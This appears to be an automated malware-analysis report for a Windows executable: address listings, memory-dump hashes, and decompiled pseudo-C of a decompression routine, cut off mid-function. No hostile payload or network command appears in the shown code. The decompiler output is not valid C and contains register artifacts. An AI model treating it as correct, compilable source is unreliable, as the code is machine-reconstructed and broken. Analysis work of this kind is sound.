                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x004069b7
                                                                                                        0x004069bd
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                        • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                        • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                        • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
